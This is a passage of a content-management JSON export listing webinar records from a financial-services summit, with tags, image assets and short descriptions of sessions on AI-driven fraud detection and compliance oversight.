Minetola.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T14:14:55.946Z","updated_at":"2025-02-18T14:14:55.946Z","content_type":"image/png","file_size":"98832","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Matt_Minetola.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T21:15:48.854Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt72c057d2e47e634c/67b495df9594de2ea70ec634/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Matt_Minetola.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Beginner","label_l10n":"Beginner","keyword":"beginner","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltb615bb59f2a540ed","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2021-08-24T12:52:37.481Z","updated_at":"2021-08-24T12:52:37.481Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-01T14:18:24.950Z","user":"blt86e7fb24ab3b9a29"}}],"tags_topic":[{"title":"Threat hunting","label_l10n":"Threat hunting","keyword":"threat-hunting","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltba572dcfa2880a69","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:33:57.466Z","updated_at":"2023-11-06T21:33:57.466Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.696Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt484a944a3d130219","ACL":{},"created_at":"2023-11-06T20:39:33.494Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fraud-detection","label_l10n":"Fraud detection","tags":[],"title":"Fraud detection","updated_at":"2023-11-06T20:39:33.494Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.155Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt5ebb3c17304b01bc","ACL":{},"created_at":"2023-11-06T20:47:38.117Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"privacy-first-ai","label_l10n":"Privacy-first AI","tags":[],"title":"Privacy-first AI","updated_at":"2023-11-06T20:47:38.117Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:58.404Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - AI, compliance, and innovation: a roadmap for FSIs","token":"UF7C93SHJQ","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T21:20:02.685Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/ai-compliance-innovation-roadmap-for-financial-services","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"f4padUGXUphmBG6kyxPRUV","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T21:20:07.900Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt2a55bdc0acc2a095","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-18T10:58:05.223Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"How AI is Influencing Fraud in Financial Services","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAs fraudsters increasingly weaponize AI, financial institutions must leverage the same technology to strengthen their defenses. In this session, \u003cstrong\u003eElastic's Deputy CISO, Anthony Scarfe\u003c/strong\u003e, and \u003cstrong\u003epetaFuel CTO, Ludwig Adam\u003c/strong\u003e, discuss how AI is reshaping fraud detection and prevention in financial services.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eAI’s dual impact: \u003c/strong\u003eAI powers real-time fraud detection but also enables cybercriminals to scale attacks. \u003c/li\u003e\u003cli\u003e\u003cstrong\u003eEvolving threats:\u003c/strong\u003e Generative AI tools like FraudGPT accelerate phishing campaigns and cross-ecosystem attacks. \u003c/li\u003e\u003cli\u003e\u003cstrong\u003eModern fraud prevention: \u003c/strong\u003eCombining machine learning for statistical analysis with generative AI for real-time incident qualification. \u003c/li\u003e\u003cli\u003e\u003cstrong\u003eData security \u0026amp; AI training: \u003c/strong\u003eEffective implementation requires integrating multiple data sources while ensuring data privacy.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eWatch the session to learn how financial institutions can detect fraud in real-time, integrate AI-powered analysis into security frameworks, and protect financial operations in an AI-driven landscape.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["bltcd361651714738a0","blt9ebdbc61667c595c"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How AI is Transforming Fraud Detection in Financial Services","seo_description_l10n":"Discover how AI is being used for both fraud prevention and cyberattacks in financial services. Learn real-time detection strategies from Elastic and petaFuel experts. Watch the session now.","seo_keywords_l10n":"AI, financial services, fraud prevention, fraud detection, cyberattacks","seo_image":{"uid":"blt5cd22460921a3c5b","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Ludwig Adam.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T10:57:47.178Z","updated_at":"2025-02-18T10:57:47.178Z","content_type":"image/png","file_size":"94035","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Ludwig_Adam.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T21:09:30.629Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5cd22460921a3c5b/67b467ab9bea6d115b4901f9/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Ludwig_Adam.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"title":"Threat hunting","label_l10n":"Threat hunting","keyword":"threat-hunting","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltba572dcfa2880a69","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:33:57.466Z","updated_at":"2023-11-06T21:33:57.466Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.696Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt484a944a3d130219","ACL":{},"created_at":"2023-11-06T20:39:33.494Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fraud-detection","label_l10n":"Fraud detection","tags":[],"title":"Fraud detection","updated_at":"2023-11-06T20:39:33.494Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.155Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - How AI is Influencing Fraud in Financial Services","token":"24IMA6RNF0","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T21:09:23.634Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/how-ai-is-influencing-fraud-in-financial-services","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"eCHagpRJWV82Cf4hpb28QR","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T21:11:02.518Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt1fbdab06fc0dc4cb","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-18T10:51:29.796Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"How unified data and AI transforms compliance oversight \u0026 risk detection at Fingerprint","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAs regulatory demands increase, financial institutions must modernize their compliance processes to detect fraud and misconduct across complex digital communication networks. In this session, \u003cstrong\u003eFounder \u0026amp; CEO, James Hogbin\u003c/strong\u003e and \u003cstrong\u003eHead of Marketing, Brielle Hewitt at Fingerprint,\u003c/strong\u003e and \u003cstrong\u003eElastic’s VP, Massimo Merlo\u003c/strong\u003e, explore how unified data and AI enhance compliance oversight.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eStronger regulatory compliance: \u003c/strong\u003eAutomating compliance processes and updating risk detection methods are now essential.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eUnified data for fraud detection: \u003c/strong\u003eFinancial crime is rarely identifiable through a single event; data integration helps reduce blind spots.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eAI-powered risk monitoring: \u003c/strong\u003eAutomated systems allow compliance teams to analyze all communications, far beyond manual review limits.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eBehavioral analysis in compliance: \u003c/strong\u003eMonitoring channel switching and language changes helps detect misconduct.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eBalancing internal \u0026amp; external risks: \u003c/strong\u003eFinancial services must address both employee misconduct and fraud threats like social media scams.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eScalable, cost-effective solutions: \u003c/strong\u003eAI-driven compliance requires efficient data storage and integration to manage oversight at scale.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eWatch now the session to learn how financial institutions can unify data, leverage AI, and automate compliance to stay ahead of evolving risks.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt35592877a9476de9","blt86c6fef96b5726e0","blt77609d2202ad9922"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How AI and Unified Data Strengthen Compliance \u0026 Risk Detection in Financial Services","seo_description_l10n":"Discover how AI and unified data approaches help financial institutions automate compliance, detect fraud, and reduce risk. Watch the session now.","seo_keywords_l10n":"AI, unified data, financial services, risk detection, fraud detection","seo_image":{"uid":"blt3555ccca068da23f","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_James Hogbin.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T10:49:45.562Z","updated_at":"2025-02-18T10:49:45.562Z","content_type":"image/png","file_size":"99077","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_James_Hogbin.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T20:59:04.866Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3555ccca068da23f/67b465c99bea6dd5534901e0/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_James_Hogbin.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"title":"Threat hunting","label_l10n":"Threat 